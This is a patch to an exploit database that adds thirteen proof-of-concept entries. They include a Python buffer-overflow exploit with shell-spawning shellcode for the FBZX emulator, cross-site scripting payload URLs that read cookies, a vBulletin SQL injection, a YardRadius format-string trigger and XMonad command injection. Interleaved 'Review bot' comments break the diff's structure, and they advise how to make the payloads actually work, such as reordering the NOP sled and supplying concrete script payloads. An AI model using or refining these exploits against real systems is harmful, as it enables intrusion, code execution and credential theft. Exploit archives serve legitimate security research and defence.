From 26f0706a86a0a35a85a7fb151acde9461e346bb2 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 12 Nov 2015 05:03:25 +0000
Subject: [PATCH] DB: 2015-11-12 13 new exploits

---
 files.csv | 13 +++++++
 platforms/hardware/remote/38663.txt | 5 +--
 platforms/hardware/remote/38671.txt | 13 +++++++
 platforms/linux/local/38681.py | 48 ++++++++++++++++++++++++
 platforms/linux/remote/38680.html | 15 ++++++++
 platforms/php/webapps/38673.txt | 21 +++++++++++
 platforms/php/webapps/38674.txt | 7 ++++
 platforms/php/webapps/38675.html | 22 +++++++++++
 platforms/php/webapps/38676.txt | 9 +++++
 platforms/php/webapps/38677.txt | 53 +++++++++++++++++++++++++++
 platforms/php/webapps/38678.txt | 44 ++++++++++++++++++++++
 platforms/php/webapps/38679.txt | 57 +++++++++++++++++++++++++++++
 platforms/php/webapps/38682.txt | 9 +++++
 platforms/php/webapps/38683.txt | 29 +++++++++++++++
 platforms/windows/local/38672.txt | 13 +++++++
 15 files changed, 355 insertions(+), 3 deletions(-)
 create mode 100755 platforms/hardware/remote/38671.txt
 create mode 100755 platforms/linux/local/38681.py
 create mode 100755 platforms/linux/remote/38680.html
 create mode 100755 platforms/php/webapps/38673.txt
 create mode 100755 platforms/php/webapps/38674.txt
 create mode 100755 platforms/php/webapps/38675.html
 create mode 100755 platforms/php/webapps/38676.txt
 create mode 100755 platforms/php/webapps/38677.txt
 create mode 100755 platforms/php/webapps/38678.txt
 create mode 100755 platforms/php/webapps/38679.txt
 create mode 100755 platforms/php/webapps/38682.txt
 create mode 100755 platforms/php/webapps/38683.txt
 create mode 100755 platforms/windows/local/38672.txt
diff --git a/files.csv b/files.csv
index 06d675562..a81b0f566 100755
--- a/files.csv
+++ b/files.csv
@@ -34941,3 +34941,16 @@ id,file,description,date,author,platform,type,port
 38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0
 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0
 38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0
+38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0
+38672,platforms/windows/local/38672.txt,"YardRadius Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0
+38673,platforms/php/webapps/38673.txt,"Collabtive Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0
+38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting Vulnerability",2013-07-22,"IeDb ir",php,webapps,0
+38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0
+38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting Vulnerability",2013-07-24,"High-Tech Bridge",php,webapps,0
+38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 'update_order' Parameter SQL Injection Vulnerability",2013-07-24,n3tw0rk,php,webapps,0
+38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0
+38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
+38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection 
Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0
+38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0
+38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
+38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
diff --git a/platforms/hardware/remote/38663.txt b/platforms/hardware/remote/38663.txt
index f4c5aa0e4..c58307d35 100755
--- a/platforms/hardware/remote/38663.txt
+++ b/platforms/hardware/remote/38663.txt
@@ -1,7 +1,6 @@
-# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on
-Adsl Modems
+# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
 # Date: 10.11.2015
-# Exploit Author: Murat Sahin
+# Exploit Author: Murat Sahin (@murtshn)
 # Vendor Homepage: Huawei
 # Version: HG630a and HG630a-50
 # Tested on: linux,windows
diff --git a/platforms/hardware/remote/38671.txt b/platforms/hardware/remote/38671.txt
new file mode 100755
index 000000000..19b97287b
--- /dev/null
+++ b/platforms/hardware/remote/38671.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/61353/info
+
+Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Barracuda CudaTel 2.6.02.04 is vulnerable; other versions may also be affected.
+
+http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
+http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT
+CODE!]%20%3C
+http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
+http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
\ No newline at end of file
diff --git a/platforms/linux/local/38681.py b/platforms/linux/local/38681.py
new file mode 100755
index 000000000..6397c447d
--- /dev/null
+++ b/platforms/linux/local/38681.py
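Review bot: The last two PoC URLs for `queues_wall_stub.html` are byte-identical, so either one is a duplicate or a different parameter was meant and got lost. The `[CLIENT-SIDE SCRIPT CODE!]` placeholders also give no concrete payload, so a reader cannot tell whether the reflection is in an attribute, a tag body or a script context, which decides what payload actually works. One concrete example per endpoint, such as `%22%3E%3Cscript%3Ealert(1)%3C/script%3E`, would make the entry reproducible.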
@@ -0,0 +1,48 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com
+# Program: fbzx - ZX Spectrum Emulator for X
+# Tested on: GNU/Linux - Kali Linux 2.0 x86
+#
+# Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow
+# vulnerability because the application fails to perform adequate
+# boundary-checks on user-supplied input.
+#
+# An attacker could exploit this issue to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Vendor homepage: *http://www.rastersoft.com/ *
+# Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/
+# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
+
+import os,subprocess
+def run():
+ try:
+ print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco"
+ print "# It's Fuzzing time on unusable exploits"
+ print "# This exploit is for educational purposes only"
+ # Basic structure: JUNK + SHELLCODE + NOPS + EIP
+
+ junk = "\x41"*8
+ shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+ nops = "\x90"*5010
+ eip = "\x10\xd3\xff\xbf"
+ subprocess.call(["fbzx",' ', junk + shellcode + nops + eip])
+
+ except OSError as e:
+ if e.errno == os.errno.ENOENT:
+ print "FBZX not found!"
+ else:
+ print "Error executing exploit"
+ raise
+
+def howtousage():
+ print "Sorry, something went wrong"
+ sys.exit(-1)
+
+if __name__ == '__main__':
+ try:
+ print "Exploit FBZX 2.10 Local Overflow Exploit"
+ print "Author: Juan Sacco"
+ except IndexError:
+ howtousage()
+run()
diff --git a/platforms/linux/remote/38680.html b/platforms/linux/remote/38680.html
new file mode 100755
index 000000000..6a8192116
--- /dev/null
+++ b/platforms/linux/remote/38680.html
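Review bot: The payload layout on the `subprocess.call` line puts the 5010-byte NOP sled after the shellcode (`junk + shellcode + nops + eip`), so a return address that lands anywhere in the sled slides forward into the saved-EIP bytes and never reaches the shellcode; unless the hard-coded `0xbfffd310` hits the first shellcode byte exactly this cannot work, and the conventional order is `junk + nops + shellcode + eip` with the address aimed into the sled. `howtousage()` calls `sys.exit(-1)` but the file only does `import os,subprocess`, so that path raises NameError instead of exiting and the import line should read `import os,subprocess,sys`. `run()` is also called unconditionally at module level, outside the `__main__` guard, so merely importing the file launches fbzx. A header comment stating that the address assumes ASLR disabled on a 32-bit Kali 2.0 stack would save readers a wasted run.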
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/61491/info
+
+XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities.
+
+Successful exploits will result in the execution of arbitrary commands in the context of the affected applications. This may aid in further attacks.
+
+
+
+<action=xclock>An innocent title</action>
+
+
+

Good bye, cruel world

+
+
+
diff --git a/platforms/php/webapps/38673.txt b/platforms/php/webapps/38673.txt
new file mode 100755
index 000000000..992d9a05b
--- /dev/null
+++ b/platforms/php/webapps/38673.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/61384/info
+
+Collabtive is prone to multiple cross-site scripting vulnerabilities, an arbitrary file upload vulnerability, and a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to bypass certain security restrictions, upload and execute arbitrary script code in the context of the affected web server process. This may let attackers steal cookie-based authentication credentials, perform unauthorized actions, or compromise the application; other attacks are possible.
+
+Collabtive 1.0 is vulnerable; other versions may also be affected.
+
+File upload:
+
+https://www.example.com/secprj/files/standard/avatar/uploadedshell_104185.php
+
+Cross-site scripting:
+
+https://www.example.com/secprj/managechat.php?userto=&uid=2
+
+">
+
+Security-bypass:
+
+https://www.example.com/secprj/manageuser.php?action=del&id=5
\ No newline at end of file
diff --git a/platforms/php/webapps/38674.txt b/platforms/php/webapps/38674.txt
new file mode 100755
index 000000000..a2ef0ae47
--- /dev/null
+++ b/platforms/php/webapps/38674.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/61401/info
+
+The FlagEm plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]
\ No newline at end of file
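Review bot: The Collabtive entry gives no reproducible steps: the file-upload item shows only the path where `uploadedshell_104185.php` ended up, not which form or parameter accepted a `.php` upload, and the XSS item stops at `">` with the script payload missing, presumably stripped along with the HTML. The security-bypass URL `manageuser.php?action=del&id=5` does not say which role can reach it or whether a CSRF token is absent, and that is the whole finding. Each item should state the request (endpoint, parameter, required role) and what in the response proves it.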
diff --git a/platforms/php/webapps/38675.html b/platforms/php/webapps/38675.html
new file mode 100755
index 000000000..d01d9d494
--- /dev/null
+++ b/platforms/php/webapps/38675.html
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/61423/info
+
+Magnolia CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Magnolia CMS versions 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 are vulnerable.
+
+
+ + + + + + + +
+
+
+
diff --git a/platforms/php/webapps/38676.txt b/platforms/php/webapps/38676.txt
new file mode 100755
index 000000000..f40d4f976
--- /dev/null
+++ b/platforms/php/webapps/38676.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/61425/info
+
+The Duplicator plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Duplicator 0.4.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/38677.txt b/platforms/php/webapps/38677.txt
new file mode 100755
index 000000000..5206740c3
--- /dev/null
+++ b/platforms/php/webapps/38677.txt
@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/61449/info
+
+VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+VBulletin 4.0.x are vulnerable.
+
+The exploit is caused due to a variable named 'update_order' not being
+sanitized before being used within an insert into statement.
+
+if ($_REQUEST['do'] == 'update_order')
+{
+$vbulletin->input->clean_array_gpc('r', array(
+'force_read_order' => TYPE_ARRAY
+));
+
+if ($vbulletin->GPC['force_read_order'])
+{
+foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)
+{
+$db->query_write("
+UPDATE " . TABLE_PREFIX . "thread AS thread
+SET force_read_order = '$order'
+WHERE threadid = '$threadid'
+");
+}
+}
+ POC
+ You will need Admincp Access then go to
+site.com/admincp/force_read_thread.php then in the force read order colum
+put a ' into one of them to show this
+ Database error in vBulletin 4.2.1:
+
+Invalid SQL:
+
+UPDATE thread AS thread
+SET force_read_order = '1''
+WHERE threadid = '5161';
+
+MySQL Error : You have an error in your SQL syntax; check the manual that
+corresponds to your MySQL server version for the right syntax to use near
+'5161'' at line 2
+Error Number : 1064
+Request Date : Thursday, July 25th 2013 @ 01:20:52 AM
+Error Date : Thursday, July 25th 2013 @ 01:20:52 AM
+Script :
+http://www.example.com/admincp/force_read_thread.php?do=update_order
+Referrer : http://www.example.com/admincp/force_read_thread.php
+IP Address :
+Username : n3tw0rk
+Classname :
+MySQL Version :
diff --git a/platforms/php/webapps/38678.txt b/platforms/php/webapps/38678.txt
new file mode 100755
index 000000000..a3174237e
--- /dev/null
+++ b/platforms/php/webapps/38678.txt
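Review bot: The affected-version claim in this entry is inconsistent: the files.csv title says `<= 4.0.2` and the text says `VBulletin 4.0.x are vulnerable`, yet the PoC's own error dump is headed `Database error in vBulletin 4.2.1`, so the range should be restated as tested on 4.2.1 and the title corrected. The quoted code interpolates not only `$order` but also `$threadid`, the array key from `force_read_order`, into `WHERE threadid = '$threadid'`; whether `TYPE_ARRAY` cleaning touches keys is not visible here, so the key looks like a second injection point worth calling out. The PoC also requires AdminCP access, which makes this a post-authentication, admin-only SQL injection, and the entry should say so up front so readers can judge impact.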
@@ -0,0 +1,44 @@
+# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection
+# Date: 11-11-2015
+# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+
+1. Description
+
+For this vulnerabilities also WP-Polls needs to be installed.
+
+Everyone can access wpfc_wppolls_ajax_request().
+
+$_POST["poll_id"] is not escaped properly.
+
+File: wp-fastest-cache\inc\wp-polls.php
+
+public function wpfc_wppolls_ajax_request() {
+ $id = strip_tags($_POST["poll_id"]);
+ $id = mysql_real_escape_string($id);
+
+ $result = check_voted($id);
+
+ if($result){
+ echo "true";
+ }else{
+ echo "false";
+ }
+ die();
+}
+
+http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html
+
+2. Proof of Concept
+
+
+ + +
+
+3. Solution:
+
+Update to version 0.8.4.9
\ No newline at end of file
diff --git a/platforms/php/webapps/38679.txt b/platforms/php/webapps/38679.txt
new file mode 100755
index 000000000..92e2dd621
--- /dev/null
+++ b/platforms/php/webapps/38679.txt
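Review bot: The description says `$_POST["poll_id"]` is not escaped properly, but the quoted handler does run it through `strip_tags()` and `mysql_real_escape_string()`, so the entry should explain why that is insufficient: escaping quotes only protects a quoted string context, and if `check_voted()` (not shown in the hunk) drops the id into SQL unquoted, a payload such as `1 AND SLEEP(5)` contains nothing to escape. It is also worth stating that `mysql_real_escape_string()` with no open `mysql_*` link emits a warning and returns `false` when WordPress is talking to the database through mysqli, which is presumably what turns the escape into a no-op here. Lines 37-41 of the new file, where the Proof of Concept request should be, arrive empty, so the PoC itself is missing from the entry as committed.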
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/61456/info
+
+Open Source SIEM (OSSIM) is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Open Source SIEM (OSSIM) 4.2.3 is vulnerable; other versions may also be affected.
+
+https://
+/ossim/vulnmeter/index.php?withoutmenu=%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E
+https://
+/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=">
+https://
+/ossim/av_inventory/task_edit.php?section=">
+https://
+/ossim/nfsen/rrdgraph.php?cmd=get-detailsgraph&profile=
+
+POST /ossim/vulnmeter/simulate.php HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
+Gecko/20100101 Firefox/21.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: https://
+/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1
+Content-Length: 72
+Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+hosts_alive=1&scan_locally=1¬_resolve=0&scan_server=&targets=blah
+
+
+POST /ossim/vulnmeter/simulate.php HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
+Gecko/20100101 Firefox/21.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: https://
+/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1
+Content-Length: 72
+Cookie: 
JXID=blahblah; JXHID=false; PHPSESSID=blahblah
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+hosts_alive=1&scan_locally=1¬_resolve=0&scan_server=Null&targets=blah
+
+
diff --git a/platforms/php/webapps/38682.txt b/platforms/php/webapps/38682.txt
new file mode 100755
index 000000000..60303c56d
--- /dev/null
+++ b/platforms/php/webapps/38682.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/61571/info
+
+Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected.
+
+http://www.example.com/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/38683.txt b/platforms/php/webapps/38683.txt
new file mode 100755
index 000000000..7474f47ef
--- /dev/null
+++ b/platforms/php/webapps/38683.txt
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/61571/info
+
+Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected.
+
+
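Review bot: Both POST bodies read `hosts_alive=1&scan_locally=1¬_resolve=0&...`, where `¬_resolve` is what `&not_resolve` becomes once `&not` is decoded as an HTML entity, so the PoC as stored never submits the `not_resolve` parameter; the bodies should read `&not_resolve=0`. The target host is also absent from every URL and `Referer:` line (`https://` followed by a break and `/ossim/...`), which looks like a stripped `<host>` placeholder and should be restored as `https://[host]/ossim/...`. Neither request says which response field reflects `targets` or `scan_server`, so a one-line note on where the injected string lands would make the two stored-XSS cases reproducible.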
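Review bot: The PoC URL for `manager.jsp` is broken by a stray space: `alert%28docu ment.cookie%29` will not parse as JavaScript, so the payload never fires; it should read `%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E`. The leading `%3C/script%3E` suggests the `site` value is reflected inside an existing script block, which is worth stating explicitly since it tells readers why the closing tag is needed before the injected one.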
+ + +
+ + + +
+ + + + + + + +
+
diff --git a/platforms/windows/local/38672.txt b/platforms/windows/local/38672.txt
new file mode 100755
index 000000000..2928774b7
--- /dev/null
+++ b/platforms/windows/local/38672.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/61356/info
+
+YardRadius is prone to multiple local format-string vulnerabilities.
+
+Local attackers can leverage these issues to cause denial-of-service conditions. Due to nature of these issues, arbitrary code-execution within the context of the vulnerable application may also be possible.
+
+YardRadius 1.1.2-4 is vulnerable; other versions may also be possible.
+
+The following proof-of-concept is available:
+
+ln -s radiusd %x
+
+./%x -v
\ No newline at end of file
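Review bot: The affected-versions line says `other versions may also be possible`, which should read `other versions may also be affected`. The PoC demonstrates only the argv[0] vector (`ln -s radiusd %x` then `./%x -v`), while the title and the first sentence claim multiple format-string issues, so the other vector(s) should be listed or the wording narrowed to the one shown. It would also help to state what the `%x` output looks like when the bug triggers, since a reader otherwise cannot distinguish a successful hit from the normal `-v` banner.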